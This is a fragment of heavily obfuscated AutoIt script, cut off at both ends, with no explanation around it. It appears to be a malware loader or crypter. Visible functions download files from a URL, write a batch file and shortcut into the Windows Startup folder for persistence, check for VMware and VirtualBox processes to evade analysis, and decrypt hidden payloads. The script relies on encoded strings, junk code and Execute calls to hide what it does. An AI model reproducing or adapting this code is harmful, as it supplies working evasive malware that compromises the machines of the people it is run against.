("UtNYssFC03Dh4abuJcOEWwnqgS3uJA3GeiDnW2T1CWMq06xIp7h54WQ" ) ENDIF IF $1203322726 = 1300820860 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,5..7..,..5..9,59,62,..59..,3,59,58..,..57..,..57..,5..9..,5..8,59..,3,..59,..5..8,60,..57,5..9..,58,55,6..1,5..7,..5..3..,..57,5..4..,60..,58..,60,5..7,..5..9,..6,5..9..,..6..2..,..6..0..,..57,57,..5..8,..6..0..,6..1,..5..9,58..,55,..53..,..55..,59..,5..5..,53,..5..5..,..5..5..,56..,..1..,..58..,..1..,..59,..6,5..9,..5,5..9..,58..,..55,..5,..57,6..2,5..9,..5..7,5..9,5..8,..59,..5,60..,..57..,..5..9..,62..,59..,..59,5..9..,6..2..,..5..9..,..5..8..,60..,..55,..5..5..,5..5..,..5..5,..62" , ".." ) ) ) ) EXITLOOP ENDIF DIM $Y97DWGYHRTYCAT6ZKUUF = 2510278 + 3854158 + 4293801246 + 4294608792 + 1644230 + 539219 + 4293769420 * 910755 NEXT ENDFUNC FUNC KMNVXSBBAW () IF $FREUKGMVKMCX (LUXBZMCWKPOC ("[C..LAS..S..:Pro..g..man..].." , ".." ) ) = ZVTZJDNXHRPQQIM ("53" ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF ENDFUNC FUNC AAPIEUMFUN ($URL , $PATH ) IF $BOOL = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..2..7..,..3..8,..4..5,31.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $32KBBZALGT = 1119509 FOR $E = 0 TO 2712344 RANDOM (2095806 ) IF $1300820860 = 176683708 THEN $FPJBQJEGCCNE ($TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $GCIZPUUYNTJL ($URL , $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $PATH ) $1300820860 = 176683708 ENDIF ISSTRING ("TfEOGsTtMn2vFHWA7BO2wmOipHgrJUr4AU9JjEznFVB" ) NEXT ENDIF ENDFUNC FUNC GLOBALDATA ($DATA , $RT ) GLOBAL $113519199 = 256356752 GLOBAL $NQZNGATQ1S = 146980 FOR $E = 0 TO 3993025 STRING ("lBT3674WHmqCbAwKVL4IS3UIbKdiUCiXeBcebIgpWdOuUpNA6yVYB0qsRk1u4WbedDxJyrJmFOXOozYV7MmvSuuolTw0RVv9bJrp1dcNZIsXdKervgxqI" ) IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..8..,3..5,40..,2..7..,44..,..51,..46,4..1..,..45,..4..6,4..4..,..35..,40,33" , ".." ) ) ) ISFLOAT ("yO5TEUsXMNhI33KIGjb" ) $113519199 = 1300820860 ISBOOL (315032 + 4293404405 + 1700342 ) ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE ISFLOAT (1487556 + 205813 + 4292996003 + 3893714 ) $113519199 = 176683708 ISSTRING (52836 + 2786511 ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $R = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50..,58..,..5..6..,..6..0..,57,..6..0..,..5..5,..5..9,62..,..5..9,..5,..5..9,60,..5..8..,..56,6..0,..53,5..9..,3..,5..9..,..6..2,..60,..57..,..5..5..,61,..5..7..,..55..,..59,62,5..9..,..5..,5..9..,..5..4,..60..,..55,60,..6..2..,..58..,..57,..59..,6,58..,..56,..6..0,..5..7..,..60..,5..5..,..59..,..62,..59..,..5,5..9..,6..0..,5..5..,6..1,..5..5,..57,5..9,..5..7,59,..54..,6..0,..5..7,..5..9,..54,..5..5..,..6..2..,55..,3,5..5,..53,55..,..5..5..,60,..3..,5..5..,..5..5,..55..,6..2.." , ".." ) ) ) ) PTR (3380382 * 1435103 ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $RETURN $113519199 = 1203322726 DIM $N0AGDC4KP4RY4YZLA1DS = 3293589 + 4291468966 * 575197 ENDIF RANDOM (2362379 ) NEXT IF $RT <> "-1" THEN FOR $I = ZVTZJDNXHRPQQIM ("54" ) TO $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0..,..58,5..8..,57..,55..,..59,..6..,..60..,..58..,..5..9,5..,..5..9..,..5..7..,55..,6..1,55,..57,..60,..55..,..55..,6..2..,..5..5,..5..3,5..5..,4..,..55..,..5..3..,..55..,5..5,5..6,5..4..,55..,..55" , ".." ) ) ) ) IF $I = ZVTZJDNXHRPQQIM ("54" ) THEN $RETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..57,..5..7,..5..9..,..3,..5..9,..3..,..58..,..5..6,..60..,..5..7..,..60,..5..5..,..60..,..58..,5..9..,..56..,..60..,5..7,5..7,6..0,59,..5..8,..6..0,57..,57,..5..7..,5..9,..54,6..0..,..5..7..,59..,5..4,..55,..61,..58..,5..5,59..,..5..8,59,..5..4..,..5..9..,5..7,..5..8..,5..5..,59,5..8,60..,..5..6,..59..,..6..,..6..0..,5..8,60..,..55,..59,..5..6,59,..58,60..,56,55..,6..1..,..55..,..5..7,6..0..,..5..5,5..8,..2..,55,5..7,59..,62..,..5..8,..4..,..5..5,..3..,5..5..,..5..3,55..,..5..7,60..,55..,..60,57..,5..5..,62,55..,..3,..5..5,..53,56..,54..,55,6..2" , ".." ) ) ) ) ELSE $RETURN &= $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50,..5..7,..5..7..,..59,..3,..5..9,3,..5..8,5..6..,..60..,..5..7,..6..0,..55..,..60..,5..8..,59..,..5..6..,..60..,..5..7,57..,60..,..5..9,..58..,60,57..,57,..57..,5..9..,..5..4,..6..0,57,..5..9,5..4,..55..,..6..1,5..8,..55,..59,..58..,..5..9,54..,..59..,..5..7..,..58,55,..59..,..5..8..,..60,5..6,..59,6..,..6..0..,58..,6..0..,..5..5,..59..,..5..6,..5..9,58..,..6..0..,5..6..,..5..5,..61,55,..57..,60,..5..5,..5..8,..2,..55,57,59..,..6..2,58..,..4..,..55,3,5..5,..53,55,..5..7,..60,5..5..,6..0,57,5..5..,..62..,..5..5,3,..55,..5..3..,5..6..,..5..4..,55..,..62" , ".." ) ) ) ) ENDIF NEXT ENDIF RETURN $RETURN ENDFUNC FUNC AFYCEUVYZX () LOCAL $OSVERSION = $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE IF NOT $ADVENYDCNHZL () THEN IF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("60" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM ("61" ) ) THEN RIINHIEBTT () ELSEIF $WQURQXMWAZTB ($OSVERSION , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,..5..3.." , ".." ) ) ) THEN IPTYOQECLE () ENDIF ENDIF ENDFUNC FUNC QTMVSHRFRD ($PID ) WHILE (1 ) $HOKAFSRHEHOF (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4..,53,..5..3..,53,53" , ".." ) ) ) IF $SNOJUKVVIBEY ($PID ) = ZVTZJDNXHRPQQIM ("53" ) THEN DJXLPTMAOK () ENDIF WEND ENDFUNC FUNC UCZPRNKTQP ($NAME , $FILENAME ) GLOBAL $1300820860 = 256356752 GLOBAL $AOBKTGNJEN = 1395198 FOR $E = 0 TO 3001171 ISSTRING ("7gAS7Cz07I7rWa4qtvxQ6oB3N4NKM6uMUA6JH2xHYLmki5XdsDKlhV3SNGedZZnbouHveuSB7Z2ubrUSgJriviE8Hn6aYuT8xl5" ) IF $1300820860 = 176683708 THEN LOCAL $FULLPATH = $STARTUPDIR & "\" & $FILENAME & LUXBZMCWKPOC ("...b..a..t" , ".." ) CHR (3925696 ) EXITLOOP DIM $S3HRVXV6PGEOFZIY1XRM = 2485843 + 3560190 * 3344209 ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTES = $DKMWACMPQYMR ($LEBAKWEILIBIQNTCTHBGGFGBKVXCKB ) & BINARY ($URTJHDWBPVQN (ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5..,5..8,..58.." , ".." ) ) ) ) $1300820860 = 176683708 STRING ("mf9FJnCyDBsF09ZNgJeGLlaL191crNmSDlMDYuYDknMANtF6DaDUsOsafxOKvzgZpKcNwvZWWJvxHI7HC5HrkCzY3LxAQnhUhYldq2JikS8S" ) ENDIF NEXT IF $DNKSORVXJZJU ($FULLPATH ) = ZVTZJDNXHRPQQIM ("53" ) THEN GLOBAL $1027989821 = 256356752 GLOBAL $FZHHA2ZOWK = 1840040 FOR $E = 0 TO 940625 RANDOM (1561290 ) IF $1027989821 = 113519199 THEN $WURIVHUQSXZK ($FULLPATH , $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC & "\" & $NAME & LUXBZMCWKPOC ("...l..n..k" , ".." ) ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FILEHANDLE = $FWRGBKVEXWEH ($FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3" , ".." ) ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $XFNAYPZBZOLC (LUXBZMCWKPOC ("k..ern..e..l32.....d..l..l" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..44,..31,27..,..4..6,3..1..,..6,3..5..,..38..,31..,..23" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("49..,45..,46,..44" , ".." ) ) , $FULLPATH , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("53" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , LUXBZMCWKPOC ("st..ru..ct..*" , ".." ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , "" ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $DBGGPSHIBQGJ ($FILEHANDLE ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $NPTGNKISXCCR ($FILEHANDLE , $BYTES ) $1027989821 = 1203322726 DIM $2CGYKWLYPSNSIE1FFBSM = 1138330 + 4292028284 * 2422679 + 1451894 ISPTR (3910360 * 133122 + 1965520 ) ENDIF INT (3334982 ) NEXT ENDIF ENDFUNC FUNC IRWNOKLXLW () LOCAL $ARRAY = [LUXBZMCWKPOC ("vm..t..oo..ls..d.....exe" , ".." ) , LUXBZMCWKPOC ("v..b..o..x.ex..e.." , ".." ) ] FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $PSZKHZKXAIEO ($ARRAY ) - ZVTZJDNXHRPQQIM ("54" ) IF $SNOJUKVVIBEY ($ARRAY [$I ] ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF NEXT ENDFUNC FUNC ZUILJTNRKW () ENDFUNC FUNC URQHLYEYWJ ($VDATA , $VCRYPTKEY , $RT ) GLOBAL $116925729 = 256356752 GLOBAL $AXUAUFRJKZ = 356708 FOR $E = 0 TO 2315332 CHR (1208239 ) IF $116925729 = 38669117 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,..5..7..,59..,..3..,59,..3..,57,..56..,59..,..5..4,..59..,3..,..59,3,5..5,..6..1,5..5,5..7..,5..8,6,58..,..6,..59..,6..0..,..58..,6,..59..,54,57,..5..6,6..0..,55..,6..0,62..,..6..0..,..5..3,..6..0..,57,..5..7..,6..2..,..59..,5..,..6..0,..57,59..,..58..,..6..0,..5..5..,..59..,5,5..9,5..4..,59,3..,..57..,..5..7,5..9..,..54..,..6..0..,57,..59,..5..4,..5..8..,..2,..56..,5..4,..5..8,4..,55,..3..,..5..5..,..5..3..,..5..5..,5..5..,59,55..,..5..9,..6,..59..,..6,..5..9,..3,55..,..55..,55,3..,..55..,..53,5..5,..5..5..,5..7..,56..,60..,..55,..6..0,..6..2..,6..0,..5..3,60,..57..,..57,..61..,59..,..54,60,..5..6..,5..9..,61..,..57,..5..7,..5..9..,..54..,..60,..57..,5..9,5..4,5..5,..5..5,..55,..3,55..,..53,55,..5..5..,59,6..1..,59..,..5..4,..5..9,5,..59..,..5..7..,..59,3..,5..9..,..58..,55,55..,..5..5..,3..,..55..,5..3,5..5..,57,..59..,..61,5..7..,5..6..,..6..0..,..55..,6..0..,..62,60..,..5..3..,..6..0,..5..7,..57,..6..1,..59..,54,..6..0,..5..6,5..9..,..61..,5..5..,3..,..5..5..,..53..,55..,..5..5..,6..0,..5..6,..60..,..5..7,..60..,..5..5..,..60..,5..8..,..59..,..56,..6..0,..5..7,..55..,..1,5..5,5..5,..5..5,..3..,..5..5..,..53,..55..,5..7,..6..0,5..7,..5..7..,..55..,6..0..,..5..8..,59,59,..59..,59,..5..5..,3..,55..,5..3,55,..5..5,..5..9,57,60..,..6..0..,..59..,..6,6..0..,..55,..5..9..,..5..7..,5..5..,..55..,55,..3..,55,53..,..57..,..5..7,59..,..3..,..59..,..3,..58..,..5..6,..60..,..57..,..60,..55,..6..0..,..58..,..59,56..,..60,57..,..5..7,6..0,..59..,..5..8,6..0..,57,..58,5..6..,..5..9..,62..,..6..0..,1..,5..9..,5..8,55..,61..,..55..,5..7,6..0..,57..,57,..55,..60..,5..8,..5..9,5..9,..59,..5..9,5..5,..6..2..,..55..,..3..,5..5..,5..3..,..5..5..,..5..5..,..59..,..5..7,60,6..0,59,6..,..6..0..,55..,59,5..7..,..5..5..,..5..5,5..5,3,55,..5..3,..5..6,5..4,..55,..6..2.." , ".." ) ) ) ) $116925729 = 2032766480 ENDIF IF $116925729 = 39019882 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7..,..57..,59,3,..59,3,..5..8,56..,..60,..57..,6..0..,55..,6..0..,..58,..59,..56..,..60..,5..7,5..7,5..6..,..6..0,..55,59..,5..8..,..59..,5..4..,60..,..5..7..,59,..58,..55..,..61,..55..,5..5..,..5..9..,5..5,6..0..,..62..,6..0,5..7..,5..9,58..,..58,..2..,..55,..5..5..,..55,5..3..,55,..59,55,5..3,..5..7,..55,..59,..6..2,..59,..5..,59..,..54,60..,55..,..60..,6..2..,5..7,..3,59..,58..,59,5,..55,..6..1..,..55..,5..7,6..0,5..9,..57..,5..7,..5..9..,..54,..60..,..57..,..59..,5..4..,55..,62..,..55..,5..3..,5..5..,2..,55..,..53..,..55..,..55,..56..,54,56..,53..,..5..6,..5..3..,..56,..5..3,..5..5..,..5..5..,55..,..53..,..5..5..,..5..9..,55..,..53..,5..5,..55,5..8..,..4,55..,55..,5..5..,..6..2.." , ".." ) ) ) ) $116925729 = 1885155689 DIM $LBINXWLC6CKU003KSYO1 = 2531406 * 689670 + 583371 * 3016559 + 3767019 STRING (216981 + 4294830286 ) ENDIF IF $116925729 = 61093985 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..5..7..,5..7..,5..9..,..3,5..9..,..3,..58..,..56,6..0,5..7,6..0,..55..,6..0..,58..,59..,..56,60..,5..7,..5..8,5..6..,59..,..5..8..,..6..0,57..,..5..7..,..5..7..,..59,..54,..60,5..7..,..5..9..,54,5..5,6..1..,5..5..,57..,..60,5..7,5..7..,62,..59,..5,6..0..,..53,60..,58,..60..,..57..,..5..5,3,55..,..53,..5..6..,..54..,55..,3..,..55,53,..55..,5..7..,59,55,5..7,..5..5,5..9,6..2..,5..9,5,..59..,..5..4..,6..0,55,..6..0,62..,5..5..,6..2" , ".." ) ) ) ) $116925729 = 1053930317 STRING ("cUJodtOqAs0Q1peCLdghXZVWVuigmg5qItqyuFfLjy3qnyRWhT62podn9XDSlHdtwIgH8Qig7D8y5DIvNv9DkdaupdyGbwzKuJ3NriY" ) ENDIF IF $116925729 = 92596336 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] -= ZVTZJDNXHRPQQIM ("54" ) ISPTR ("rEnhd0IJjtHWr5qKeKdxevK4eEGH2ujofKW4t4sJbUAJgF13k9VsS2J54tcIsbRYktQRjvrkrDvt5bY" ) $116925729 = 1604509846 ISBINARY ("J0Fma0a91UqacMyWZjUYSKaoFqa3ED4NOYntYCRsvrsHmvrsLcTE4Hk9ZqRT0hEw0Mvnyf8vBACArCbk8SqBVyTgNnEGW7BoW5SJ9d3Gew" ) ENDIF IF $116925729 = 113519199 THEN LOCAL $TTEMPSTRUCT $116925729 = 1027989821 MOD (2055517 , 3023122 ) ENDIF IF $116925729 = 116471326 THEN $VRETURN = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] $116925729 = 1196440215 ENDIF IF $116925729 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28,35,..40..,..27..,..44..,5..1..,4..6..,..4..1,..4..5,..4..6,4..4..,..3..5,40,3..3.." , ".." ) ) ) $116925729 = 1300820860 ENDIF IF $116925729 = 256356752 THEN LOCAL $E = EXECUTE $116925729 = 176683708 ENDIF IF $116925729 = 432319576 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,..5..7..,..57,..5..9,3,..5..9,3,5..7,56..,59..,..54..,..5..9..,3,5..9..,..3..,5..5..,..6..1..,..5..5,5..7..,5..8..,..6..,58..,..6..,..5..9..,6..0..,..5..8,..6,59,..5..4,57,..56..,..6..0,5..5..,..60,..62..,..60,5..3,..6..0,..5..7,..5..7,..62..,..5..9,..5,..6..0,5..7..,..59..,..58,..60,..5..5..,5..9,..5..,5..9,..54,5..9..,3,..5..7,57,..59..,54,..60,..57..,5..9..,..54,5..8..,..2..,..55..,..55,..56..,..5..4,55..,5..5,58,..4,..5..5..,3..,5..5..,5..3,..55,..55..,59..,5..5,59..,6,5..9,6..,..5..9..,..3..,..5..5..,5..5..,..5..5,3,..5..5,..53..,..55..,..55..,57,..5..6..,..60..,..5..5,..6..0,62,..60..,53,..6..0,5..7..,5..7..,57,..59,..58..,60..,5..6,..6..0,..57..,..6..0..,5..5,59,6,60,6..2..,5..7,2,5..9..,..5..8..,6..0..,62,5..5..,5..5..,..55,3,55..,5..3..,..55..,..5..5,..5..9..,..61..,..59,54..,59,5,..5..9..,5..7..,..5..9,3..,..59,58,..5..5..,..55..,..55,..3..,..5..5,..5..3..,55..,..5..7,60,59..,5..7,..5..6,..60..,55,..60..,6..2..,..60,5..3..,60,..5..7,..5..7,2..,5..9,58..,6..0,..62..,..55..,..62" , ".." ) ) ) ) ISPTR ("vpb3FhrqmtxUtqRVDS6MXJE1fvLYuZtfNnfMnQOCjsqOZ4" ) $116925729 = 92596336 CHR (439850 ) ENDIF IF $116925729 = 586524435 THEN LOCAL $A_CALL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50..,..5..7..,..57..,..5..9,3..,59,3,..5..7,56,5..9..,..54,59..,..3,..5..9..,..3..,..5..5..,61..,5..5..,..5..5..,..5..9..,5..,60..,..57,..59..,5..7,..5..9..,3,5..9..,..3..,..5..5..,..5..,59..,..57..,59,3..,59..,..3,..55,55,..5..5,3..,5..5,..53..,5..5,..5..5,..59..,..6..2,59..,5..,60,57,55,55..,..5..5,..3..,..5..5,5..5..,..58..,55,6..0..,5..7,..5..9..,3,..5..7..,..57..,..5..9..,5..8..,59..,..56,59..,6..,59,..4..,..6..0..,..53..,60..,55,..59..,..58..,..6..0..,..56,..6..0,5..6..,..5..7..,..5..5..,60,..58,5..9,5..9,..5..9..,..5..9..,59..,5..8..,..60,55..,..5..5..,..5..5,..5..5,..3..,..5..5..,..5..5,..6..0..,58..,6..0..,56,5..9..,..6..1,..5..9,6,..60,5..5,..60..,5..7..,55,..55..,..5..5..,..3,..5..5,5..3,5..6,..55,55,..3..,..55..,..55,..6..0..,53,60,..5..7,6..0,..5..5..,5..5,55..,55,3,55..,53..,5..7,..57..,59..,..3,..5..9..,..3,..58..,56..,6..0,..57,60..,..5..5,..6..0,..58..,..5..9..,..5..6,..60..,..57,5..7..,6..0..,59..,5..8,..6..0,5..7,..5..8..,..53..,..60,..57..,60,5..5,55,..61,..55,..5..7,6..0,..5..7,5..7..,..55..,..6..0,5..8,..5..9,5..9,..5..9..,..5..9,59..,..58,60..,55,5..5..,62,55,3,5..5,..55..,59..,5..7,60,60,..59..,6,..6..0..,55,..59..,5..7,55,5..5..,..55..,..3,..5..5,5..3..,..5..7,..57..,5..9,..3,5..9..,..3..,58..,..56..,60..,5..7..,..60..,..5..5..,..60,5..8..,..5..9..,..5..6..,..60,5..7..,5..7,..60,59..,..5..8..,60,..57..,5..8..,5..6,..59,..6..2,60..,..1..,5..9..,..58,5..5,61,55..,..5..7,..6..0..,5..7..,..57,..5..5..,..60,..5..8,59,5..9..,59..,..59,59..,..5..8..,..60..,..55,..55..,62,55,3..,55,..5..5..,..60,..53,6..0,57,..60..,5..5,..5..5,5..5,..55,3..,..55,..5..3..,..5..7..,57,..59,3,..59..,..3..,58,..56..,60..,..57,..60,..55..,..60..,..58..,59,5..6..,..6..0..,..5..7,5..7,60,..5..9,58,..6..0..,..5..7..,58..,5..3..,..6..0..,5..7,..6..0,5..5,..5..5..,..61..,..5..5,..57..,60,57..,57,..62..,5..9..,5,..6..0,53..,..6..0,..58..,..60..,..57,..5..5..,62..,..5..5,..3,..5..5,5..5..,5..9..,..57..,..6..0,6..0..,59,..6,60..,5..5,59..,5..7..,..5..5..,..55..,..5..5..,3,..55,5..3..,5..7,5..7..,5..9..,..3..,..5..9..,..3..,..58..,..56..,..60,57..,60..,5..5..,..60..,..58..,59..,5..6,6..0,..5..7..,57..,..6..0,5..9,5..8..,..60,..5..7..,58,..56..,..5..9..,6..2..,..60,..1..,..5..9,..58..,..55,..6..1,..55..,..5..7,60..,5..7,..57,..6..2,59..,..5,..6..0..,5..3,..6..0,..5..8..,..60..,5..7,..5..5,6..2..,5..5..,..3..,..55,5..5..,..5..9,..5..7..,..60,..60,..5..9,..6,60..,..55,59..,5..7..,55..,1..,..55..,..5..5,5..5..,3..,..5..5..,53..,..5..6,..5..3..,5..5,6..2" , ".." ) ) ) ) ISBOOL (3036564 * 693275 ) $116925729 = 1453481599 RANDOM (1505347 ) ENDIF IF $116925729 = 737653776 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57,..57,5..9,..3,..5..9..,..3,..5..8,..56,..6..0..,..57,..60,5..5,..6..0..,5..8,5..9..,..56..,6..0,..57,58,..5..6..,59..,5..8..,..60..,5..7,57,5..7,..59..,..5..4,6..0,5..7..,..5..9..,54,..5..5,..61..,..55..,..57,60..,..5..7..,57..,55,60..,..58,..59..,..59..,59,..5..9..,..55,3,55,53,5..7,..58..,..6..0,61..,..5..9..,..5..8..,..59,56..,60..,5..8,6..0..,..5..7,5..9,..5..8..,5..5..,6..1..,56..,5..4,5..5..,..6..2..,55..,..3,55..,..53..,..5..5,..5..7,6..0..,..5..9,..5..7,56,..60..,..55,60..,..6..2,..60..,..53..,..60,5..7..,5..7..,2,59..,58..,60,..6..2,55,..62" , ".." ) ) ) ) $116925729 = 38669117 DIM $CCES0BLSID4XMQ3MS2D2 = "7Qw3NGZ6rQ3NdvrgC5iL1wzb9XblC2lD4IFWhzlEww1wbUi5KG075qMKqv4" ENDIF IF $116925729 = 781366022 THEN LOCAL $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..0..,57,..5..7,5..9..,3,59,..3..,57,..56..,..5..9,5..4,..5..9,3,5..9,3..,5..5,..61,5..5,5..7..,58..,..6,58..,6,5..9..,60..,5..8..,..6..,59..,..5..4..,..57,5..6..,..60..,..5..5,6..0..,..6..2,..60..,..5..3,..6..0,..5..7..,..5..7,6..2,5..9,..5..,6..0..,..57,..5..9,5..8,6..0,5..5,..59,..5..,..5..9..,5..4,5..9,3,57..,5..7..,..59..,54..,6..0,..5..7..,59,..54..,58,2..,..56..,5..4..,..5..8,4..,55..,..3..,55,5..3,..5..5..,..5..5..,59..,5..5..,5..9..,..6..,5..9..,..6..,..59..,3..,..5..5,5..5,5..5..,3,5..5,..5..3..,..5..5..,..55,..57..,56,..60..,55,..6..0..,..62,60..,5..3,..60,..5..7,5..7,5..4,5..9,..5..6..,6..0,54..,..6..0..,58,..5..9,6..2,60,55..,..5..9..,..5..8..,..5..7,5..6..,..59,6..,..5..9,5,..60..,57,..5..9,..5..8,60,..61,..60..,..57..,55..,55,..55,..3,5..5..,..5..3..,..5..5,55,..5..9..,6..1,..5..9..,54..,..59,..5..,59,..57..,59,3,..5..9..,58,..55..,..1..,55..,..5..5,..55..,3..,5..5,..53,..5..6,..5..3..,5..5,3..,..55..,..5..3..,5..5,..5..5..,..6..0..,..5..3..,60..,57..,..6..0,..5..5..,..5..5,5..5,5..5..,3..,55..,5..3..,56,..53..,..55..,3..,..55..,53..,..5..5..,55..,..60,5..3,6..0,57,6..0,..55..,55,..5..5..,5..5..,3,..55,53..,..5..6,..5..3..,55..,3..,55,..53,5..5..,..55..,5..9..,5..7..,..6..0..,..60..,5..9,..6,..6..0..,55..,5..9..,57,55..,..55,..5..5,..3,55,..5..3,..5..6,..5..5,56,57,55,..3,55,5..3,..5..5,..55,59,..57,60,..6..0,59,..6,..6..0,55..,5..9,5..7,..5..5..,5..5..,..5..5,..3..,5..5..,53..,55,..55,5..6..,..5..3..,..60..,..6..1..,..57,..59..,..56..,..53..,56..,53,5..6..,53,56,..53..,5..6,5..3..,..5..6..,53,..5..6,..5..3..,55..,..55..,..5..5,62.." , ".." ) ) ) ) ISBINARY ("EyUEZE8dTNpEEc9pNgK6coIN65FWEu9U3B2LaNffHWnqbhfn" ) $116925729 = 864731176 ENDIF IF $116925729 = 848901156 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..5..7,..5..9..,..3..,..5..9,3,..57,56..,59..,54..,..5..9,3..,..5..9..,..3,..5..5..,61,..55..,..57..,..58..,6..,5..8..,..6,..5..9..,60..,..58..,6..,..59,..5..4..,5..7,..5..6..,60..,..55,6..0..,..6..2,6..0,..5..3..,6..0,57,..5..7..,62,..59,..5,..6..0..,57..,..59,5..8..,6..0..,55,..5..9,..5,..5..9,..54,59,..3..,5..7,57..,5..9,5..4..,60,..57,..59,5..4,..5..8,..2..,5..6..,..5..4..,5..8..,..4..,..55..,..3..,5..5..,..5..3..,..5..5,55..,5..9..,55..,..5..9..,..6..,..59,6..,..5..9,3,5..5..,5..5..,55,..3..,5..5..,..5..3,..5..5,..5..5..,..5..7..,..56..,..6..0..,..5..5..,..6..0..,..6..2,..6..0..,53,..60,..5..7..,5..7..,..56..,60,5..5,59,..58..,..59,54..,60,..5..7..,..59..,..58..,5..7,61,5..9,54..,60..,..5..6..,..59,6..1..,5..5,..55..,55..,..3..,5..5,53,..5..5,5..5..,..5..9..,6..1..,..5..9,..5..4,59..,..5,..5..9,..5..7..,..59,3,5..9,..58..,..55,55,..5..5,..3..,5..5..,..5..3,55,..5..7..,..5..8,..6..,..58..,..6,..5..9..,..6..0..,58,6,59..,5..4,57..,56..,..6..0,5..5..,..6..0..,62,..6..0,5..3..,..6..0,..57..,..5..7,..6..2..,..5..9,5..,60,..57..,..59..,5..8,60,55,59..,5,..59,..54,5..9,3,57,5..7,..5..9..,..5..4..,60,57..,5..9,..5..4..,..58..,2..,..56..,..55..,5..8,..4,55..,..3..,..5..5..,..5..3,..55,..5..5..,60..,..58..,..5..9,62,5..9..,5,..6..0..,57,..5..5..,55,..5..5,3,5..5,53,..55..,..55..,56..,..53..,6..0,61,..5..6,5..3..,..5..6..,..53,5..6..,53,..5..6..,..5..3,..5..6,..61..,..56..,53,..5..6..,..5..3,56..,5..6,5..5..,5..5,..55..,3..,..55..,53..,..5..5,..5..5..,60..,..53..,6..0..,..57,60..,..5..5..,55..,..55,..55..,3..,..55..,53,..56,5..3,5..5,..3..,..55..,..53..,..5..5..,55,5..9..,57,6..0,..6..0,..5..9,6..,..6..0..,5..5..,..59..,5..7..,55,55,5..5..,..3,5..5,5..3..,5..6,..5..3..,..5..5,3,5..5,..53,..55..,5..5,..5..9,6..1..,59..,54,5..9,..5,..59..,57,5..9..,..3,59..,..5..8..,..55..,1..,55..,..5..5,55..,3..,5..5..,53..,..56,53,..5..5..,..6..2" , ".." ) ) ) ) $116925729 = 1718368979 ISBOOL (3936637 + 4293346114 ) ENDIF IF $116925729 = 864731176 THEN $__G_ACRYPTINTERNALDATA 